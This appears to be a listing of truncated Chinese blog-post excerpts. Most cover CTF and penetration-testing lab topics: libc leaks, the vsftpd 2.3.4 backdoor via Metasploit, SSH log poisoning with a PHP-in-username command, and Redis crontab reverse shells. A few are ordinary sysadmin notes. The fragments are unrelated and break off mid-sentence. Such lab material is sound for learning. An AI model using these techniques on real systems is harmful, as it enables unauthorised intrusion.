最近做一些難的題目，越來越自閉，感覺自己的基礎知識還有待補充，索性暫停源短時間做題，先把一些基礎知識理一理。本系列博客以《ctf-in-all》以及i春秋的《linux pwn基礎入門》為基礎開始學習。 第一篇博客，來理一理如何利用漏洞獲取libc。 首先，libc是什么？ libc 即在 ...

vsftpd version 2到2.3.4存在后門漏洞，攻擊者可以通過該漏洞獲取root權限。這 里用backtrack 集成的metasploit做測試,metasploit集成了各種各樣的漏洞，我們可以在上面利用服務器、個人PC和應用程序的漏洞。開始菜單路徑 backtrack ...

今天看文章學了一招，有包含漏洞無法傳文件的時候用 目標服務器環境為ubuntu，ssh登錄日志文件是/var/log/auth.log 找個Linux的環境執行ssh '<? phpinfo(); ?>'@192.168.48.129 這個時候我們看下auth.log ...

方法一、利用計划任務執行命令反彈shell 在redis以root權限運行時可以寫crontab來執行命令反彈shell 先在自己的服務器上監聽一個端口： 然后執行命令: root@kali:~# redis-cli -h ...

，並且版本為：6.4.54。 利用搜索引擎查找根據Unifi Network 6.4.54版本相關的漏洞，得 ...

一 ：獲取單個網卡的IPv4地址，方法如下：方法一：$/sbin/ifconfig ethX | awk '/inet addr/ {print $2}' | cut -f2 -d ":" 方法二：$/sbin/ifconfig ethX | awk '/inet addr ...

觀察Oracle數據庫性能，oracle自帶的awr功能為我們提供了一個近乎完美的解決方案，通過awr特性我們可以隨時從數據庫提取awr報告。通過報告可以了解一個系統的整個運行情況，生成的報告包括多個部分。 如何獲取awr報告？ 通過awrrpt.sql腳本執行 ...

一、環境說明 目標IP： 本人虛擬機 192.168.80.134 ，使用 metasploit2 攻擊IP： 本人虛擬機 192.168.80.129 ，使用 kali 二、匿名用戶登錄 r ...